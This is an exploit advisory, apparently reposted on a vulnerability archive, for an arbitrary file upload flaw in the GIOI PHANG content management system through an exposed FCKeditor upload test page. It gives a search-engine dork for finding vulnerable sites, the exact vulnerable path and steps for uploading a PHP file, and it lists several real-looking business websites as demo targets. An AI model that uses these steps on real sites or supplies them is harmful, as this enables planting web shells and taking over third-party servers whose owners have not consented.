GIOI PHANG (fckeditor) Arbitrary File Upload Vulnerability

2015.12.15
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

######################################################################################## # # Exploit Title : GIOI PHANG (fckeditor) Arbitrary File Upload Vulnerability # Exploit Author : Linux Zone Research Team # Vendor Homepage: http://tgp.vn # Google Dork : intext:Powered (+) Designed THE GIOI PHANG Ltd. # Date : 14-December-2015 # Tested On : Linux - Chrome # MY HOME : http://linux-zone.org # ###############################[ DESCRITION ]##################################### # # GIOI PHANG Arbitrary File Upload Vulnerability .. # Vietnam Content Management System Site By tgp.vn # Published By Linux Zone Research Team # ###############################[ LOCATION + Exploit ]############################# # # exploit => /editor/filemanager/connectors/uploadtest.html # # first go to Target => http://site.com/ # # Add exploit => http://www.site.com/editor/filemanager/connectors/uploadtest.html # # select => Select the "File Uploader"> php ... upload to : Uploaded File URL: # ##############################[ Demo ]############################################ # # http://www.lavaXdigital.vn/editor/filemanager/connectors/uploadtest.html # # http://hypertecXh.vn/editor/filemanager/connectors/uploadtest.html # # http://www.pXhohoiresort.com/editor/filemanager/connectors/uploadtest.html # # http://thienphonXg.vn/editor/filemanager/connectors/uploadtest.html # # http://tg-electriXc.com.vn/editor/filemanager/connectors/uploadtest.html # # http://www.phXohoiresort.com/editor/filemanager/connectors/uploadtest.html # ################################################################################### # # Hassan Shakeri - Mohammad Habili # # Twitter : @ShakeriHassan - Fb.com/General.BlackHat ###################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top